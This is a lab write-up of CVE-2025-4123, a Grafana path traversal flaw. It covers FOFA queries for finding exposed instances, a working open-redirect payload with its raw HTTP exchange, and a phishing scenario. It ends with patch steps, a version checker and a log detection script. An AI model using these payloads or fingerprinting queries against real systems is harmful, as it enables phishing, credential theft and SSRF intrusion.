01 Overview
What is CVE-2025-4123?
CVE-2025-4123 is a high-severity vulnerability affecting Grafana — the industry-standard open-source observability platform deployed across millions of engineering stacks worldwide. Discovered by security researcher Alvaro Balada via Grafana's bug bounty program on April 26, 2025, it was publicly disclosed on May 21, 2025.
The root cause is a client-side path traversal flaw in Grafana's /public/ static file handler. By crafting a single malformed URL with encoded path separators, an attacker can escape the intended directory scope and trigger three distinct attack primitives — all without any authentication.
Open Redirect
Redirect victims to any external domain via a crafted Grafana URL. Trusted domain abused for phishing — no login needed.
Full-Read SSRF
Reach internal cloud metadata services (169.254.169.254) and internal APIs when the Grafana Image Renderer plugin is installed.
Stored XSS
Execute arbitrary JavaScript in a victim's browser when anonymous access is enabled — a common config for public dashboards.
// CVE-2025-4123 — full details table from official disclosure
02 Reconnaissance
Finding Grafana Instances with FOFA
FOFA is a cyberspace mapping engine widely used by bug bounty hunters and red teamers for asset discovery. Grafana exposes a unique favicon with a known hash — making it trivially fingerprinted across the internet regardless of URL structure or port number.
FOFA Queries
# Find ALL Grafana instances globally
app="Grafana"
# Target a specific bug bounty scope
domain="example.com" && icon_hash="2123863676"
OR
Host="example.com" && icon_hash="2123863676"
// FOFA query targeting a specific domain with Grafana favicon hash

Version Fingerprinting (No Auth Required)
Before sending any payload, confirm the Grafana version. The /api/health endpoint returns the exact build version with zero authentication:
curl http://TARGET:3000/api/health
# Response:
{
"commit": "03f502a94d17f7dc4e6c34acdf8428aedd986e4c",
"database": "ok",
"version": "10.4.0" ← VULNERABLE (< 12.0.0-security-01)
}
// /api/health leaking exact version — version 10.4.0 confirmed vulnerable
Version Range                Status
All 10.x < 10.4.14           VULNERABLE
All 11.x < backport patch    VULNERABLE
12.0.0 (GA release)          VULNERABLE
>= 12.0.0-security-01        PATCHED ✓
03 Lab Setup
Spinning Up a Vulnerable Lab with Docker
All testing was performed on Kali Linux using a locally containerized Grafana 10.4.0 instance — fully isolated and reproducible.
Step 1 — Clone Exploit Tool
# Clone the PoC tool
git clone https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
cd CVE-2025-4123-Exploit-Tool-Grafana-
# Install Python dependency
pip install requests
Step 2 — Launch Vulnerable Grafana Container
# Pull and run Grafana 10.4.0 (vulnerable); name the container so it can be stopped later
docker run -d --name grafana -p 3000:3000 grafana/grafana:10.4.0
# Verify it's live
curl http://127.0.0.1:3000/api/health
// Docker pulling grafana:10.4.0 — ~110MB across 7 layers, container on port 3000
04 Exploitation
Three Methods to Trigger the Vulnerability
⚠ Responsible Disclosure
All testing was conducted in an isolated local lab environment against a self-hosted container. Never test against production systems without explicit written authorization.
Method 1 — exploit.py Interactive Mode
Run the exploit tool against the local Grafana instance. It supports SSRF, LFI, and Open Redirect modes:
python3 cve_2025_4123_exploit_mitsec.py -u http://127.0.0.1:3000
For Open Redirect targeting google.com, the tool generates this crafted payload URL:
http://127.0.0.1:3000/public/..%2F%5cgoogle.com%2F%3f%2F..%2F..
The key trick is the traversal sequence ..%2F (URL-encoded ../) combined with %5c (an encoded backslash) to escape the /public/ directory scope. Grafana's static file handler normalizes the path and answers with a 302 whose Location is /\google.com/?/../.., without validating where that destination points. Browsers treat a backslash like a forward slash in http(s) URLs, so /\google.com/ is read as the scheme-relative //google.com/ and the victim ends up on the external domain.
Method 2 — Burp Suite Repeater
Manually sending the payload in Burp Suite confirms the raw HTTP behavior — a clean 302 Found response:

GET /public/..%2F%5cgoogle.com%2F%3f%2F..%2F.. HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0
Accept: */*
Connection: close
---
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /\google.com/?/../..
Date: Mon, 09 Mar 2026 11:45:41 GMT
Content-Length: 44
<a href="/\google.com/?/../..">Found</a>.
// Burp Suite Repeater confirming 302 → Location: /\google.com/?/../..
Method 3 — Browser Open Redirect (Live Demo)
When a victim clicks a crafted link or it loads inside a phishing iframe, their browser follows the 302 from the trusted Grafana domain — silently navigating to the attacker's site:
# Victim sees this URL (looks like a legitimate Grafana link):
http://grafana.company.com/public/..%2F%5Cgoogle.com%2F%3F%2F..%2F..
# Browser ends up at:
https://google.com/?/../.. ← or any attacker-controlled domain
// Browser OPEN REDIRECT CONFIRMED — Google.com loaded directly from the Grafana URL


05 Impact
Why This Matters at Scale
Grafana sits at the center of modern observability stacks — connected to Prometheus, databases, cloud accounts, CI/CD pipelines, and on-call systems. Compromise of Grafana frequently means access to every credential and data source it manages.
// Impact matrix and CVSS 7.6 High scoring breakdown
🔴 Critical Attack Scenario
Attacker sends a phishing email with a link to grafana.company.com/public/..%2F%5Cattacker.com... — the target sees a legitimate company domain in the URL, clicks it, and lands on a credential-harvesting page. The open redirect requires zero auth and works on any vulnerable instance regardless of Grafana's authentication settings.
Attack Mode     Impact                                               Prerequisite
Open Redirect   Phishing, credential theft, session hijacking        None — works universally
SSRF            AWS/GCP/Azure IAM credentials, internal API access   Image Renderer plugin installed
LFI             Read server-side files (config, keys, .env)          Specific endpoint configuration
XSS             Arbitrary JS execution in victim's browser           Anonymous access enabled
06 Remediation
How to Fix This Immediately
1 Upgrade Grafana to the patched version
The only complete fix is upgrading. All versions below the security patch remain vulnerable.
2 Pull the security release via Docker
# Assumes the vulnerable container was started with --name grafana
docker pull grafana/grafana:12.0.0-security-01
docker stop grafana && docker rm grafana
docker run -d --name grafana -p 3000:3000 grafana/grafana:12.0.0-security-01
# Verify patch
curl -s http://localhost:3000/api/health | grep version
# Must show >= 12.0.0-security-01
3 Check your version track for the minimum safe version
Grafana Track   Minimum Safe Version
12.x            12.0.0-security-01 or 12.0.1+
11.x            11.6.1, 11.5.4, 11.4.3, 11.3.4, 11.2.8, 11.1.11, 11.0.11
10.x            10.4.14, 10.3.18
9.x / 8.x       End of Life — upgrade required
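The following is an added example, not code from the post or from the exploit tool: a small Python checker that reads the /api/health JSON shown in the reconnaissance section and classifies the reported build against the minimum-safe-version table above. It assumes that a "-security-NN" suffix sorts above the bare release it patches (so 12.0.0-security-01 is newer than 12.0.0) and that tracks which began after the fix (12.1 and later) are patched; the sample health bodies are constructed, and their commit values other than the lab one are placeholders.

```python
"""Classify a Grafana build against the CVE-2025-4123 fix versions.

Added example, not code from the post or the exploit tool. MIN_SAFE is the
minimum-safe-version table from the remediation section; the sample
/api/health bodies are constructed (commit values are placeholders).
"""
import json
import re
import sys
import urllib.request

# (major, minor) track -> lowest fixed build as (major, minor, patch, security_no).
# Assumption: a "-security-NN" suffix sorts above the bare release it patches,
# so 12.0.0-security-01 > 12.0.0, while 12.0.1 (no suffix) is also above it.
MIN_SAFE = {
    (12, 0): (12, 0, 0, 1),
    (11, 6): (11, 6, 1, 0),
    (11, 5): (11, 5, 4, 0),
    (11, 4): (11, 4, 3, 0),
    (11, 3): (11, 3, 4, 0),
    (11, 2): (11, 2, 8, 0),
    (11, 1): (11, 1, 11, 0),
    (11, 0): (11, 0, 11, 0),
    (10, 4): (10, 4, 14, 0),
    (10, 3): (10, 3, 18, 0),
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-security-0*(\d+))?")


def parse_version(version: str):
    """'12.0.0-security-01' -> (12, 0, 0, 1); '10.4.0' -> (10, 4, 0, 0); None if unparseable."""
    m = VERSION_RE.match(version.strip())
    if not m:
        return None
    major, minor, patch, sec = m.groups()
    return (int(major), int(minor), int(patch), int(sec or 0))


def classify(version: str) -> str:
    """Return 'patched', 'vulnerable', 'end-of-life' or 'unknown' for a version string."""
    v = parse_version(version)
    if v is None:
        return "unknown"
    track = (v[0], v[1])
    if v[0] <= 9:
        return "end-of-life"  # 9.x / 8.x: no fix exists, upgrade required
    floor = MIN_SAFE.get(track)
    if floor is None:
        # Assumption: tracks that started after the fix (12.1 and later) are patched;
        # 10.x / 11.x minors without a listed backport have no fixed build.
        return "patched" if track > (12, 0) else "vulnerable"
    return "patched" if v >= floor else "vulnerable"


def assess_health(body: str) -> dict:
    """Classify the JSON body returned by GET /api/health (no auth needed)."""
    data = json.loads(body)
    version = str(data.get("version", ""))
    return {"version": version, "commit": data.get("commit", ""), "status": classify(version)}


def check_instance(base_url: str, timeout: float = 5.0) -> dict:
    """Fetch /api/health from a live instance and classify it."""
    url = base_url.rstrip("/") + "/api/health"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return assess_health(resp.read().decode("utf-8"))


# Constructed sample bodies in the shape the post shows for /api/health.
SAMPLE_HEALTH = {
    "lab-10.4.0": '{"commit": "03f502a94d17f7dc4e6c34acdf8428aedd986e4c", "database": "ok", "version": "10.4.0"}',
    "ga-12.0.0": '{"commit": "PLACEHOLDER", "database": "ok", "version": "12.0.0"}',
    "fixed": '{"commit": "PLACEHOLDER", "database": "ok", "version": "12.0.0-security-01"}',
}

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check_instance(sys.argv[1]))
    else:
        for name, body in SAMPLE_HEALTH.items():
            print(name, assess_health(body))
```

Saved as, say, check_grafana.py (a name chosen here), it can be run with a base URL (python3 check_grafana.py http://127.0.0.1:3000) to query your own instance, or with no argument to see the constructed samples classified. Pointing it at a fleet inventory of Grafana hosts is the quickest way to find which tracks still need the backport.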
Temporary Hardening
While patching, consider placing Grafana behind a reverse proxy that strips or blocks requests containing %5c, %2F..%2F, or backslash sequences in the /public/ path. Also audit whether anonymous access is truly needed — disabling it removes the XSS vector.
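As an added example (not from the post or the exploit tool), here is the hardening rule above expressed as detection logic that can also back a proxy rule: it percent-decodes each request path before matching, because a literal string filter for %5c or %2F..%2F is only as good as the encoding it expects, and then flags /public/ requests that contain a backslash or a .. segment. It runs over constructed combined-format access-log lines; the first and last request lines are the two payload URLs already shown in the exploitation section, while the other paths, addresses and user agents are made up for the demo.

```python
"""Flag /public/ requests carrying the CVE-2025-4123 traversal pattern.

Added example, not code from the post or the exploit tool. It applies the
temporary hardening rule (reject /public/ requests containing '..' or a
backslash) after percent-decoding, which is how a proxy rule should match.
The access-log lines are constructed; the flagged request lines are the
two payload URLs from the exploitation section.
"""
import re
from urllib.parse import unquote

# Request line inside a combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST|OPTIONS) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded to avoid loops)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_reasons(target: str) -> list:
    """Reasons a request target matches the pattern; an empty list means clean.

    A literal '?' ends the path the file handler sees, so only that part is
    decoded and inspected. Both '/' and '\\' count as segment separators
    because the browser treats them alike when it follows the redirect.
    """
    raw_path = target.split("?", 1)[0]
    path = decode_fully(raw_path)
    if not path.lower().startswith("/public/"):
        return []
    reasons = []
    if "\\" in path:
        reasons.append("backslash in /public/ path")
    if ".." in re.split(r"[/\\]", path):
        reasons.append("'..' segment in /public/ path")
    return reasons


def scan_access_log(lines) -> list:
    """Return (line_number, target, reasons) for every flagged request line."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = traversal_reasons(m.group("target"))
        if reasons:
            hits.append((number, m.group("target"), reasons))
    return hits


# Constructed combined-format log lines (addresses and static paths are made up).
SAMPLE_LOG = [
    '127.0.0.1 - - [09/Mar/2026:11:45:41 +0000] "GET /public/..%2F%5cgoogle.com%2F%3f%2F..%2F.. HTTP/1.1" 302 44 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Mar/2026:11:46:02 +0000] "GET /public/build/app.js HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [09/Mar/2026:11:46:10 +0000] "GET /api/health HTTP/1.1" 200 70 "-" "curl/8.5.0"',
    '10.0.0.9 - - [09/Mar/2026:11:47:00 +0000] "GET /public/..%2F%5Cgoogle.com%2F%3F%2F..%2F.. HTTP/1.1" 302 44 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, target, reasons in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {target} -> {', '.join(reasons)}")
```

A 302 from /public/ with a Location beginning in /\ is the server-side signature to correlate with; on a patched build the same request is expected to be rejected rather than redirected, so any remaining hits after the upgrade point at a host that was missed.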
References
▶ Exploit Tool: https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
▶ Official Grafana Advisory: https://grafana.com/blog/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
▶ Grafana Security Advisory: https://grafana.com/security/security-advisories/cve-2025-4123/
▶ NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-4123
▶ IONIX Analysis: https://www.ionix.io/blog/grafana-cve-2025-4123-open-redirect-stored-xss-patch/
▶ ProjectDiscovery Nuclei Template: https://cloud.projectdiscovery.io/library/CVE-2025-4123
▶ CVSS: 7.6 High — Discovered by Alvaro Balada — Disclosed: May 21, 2025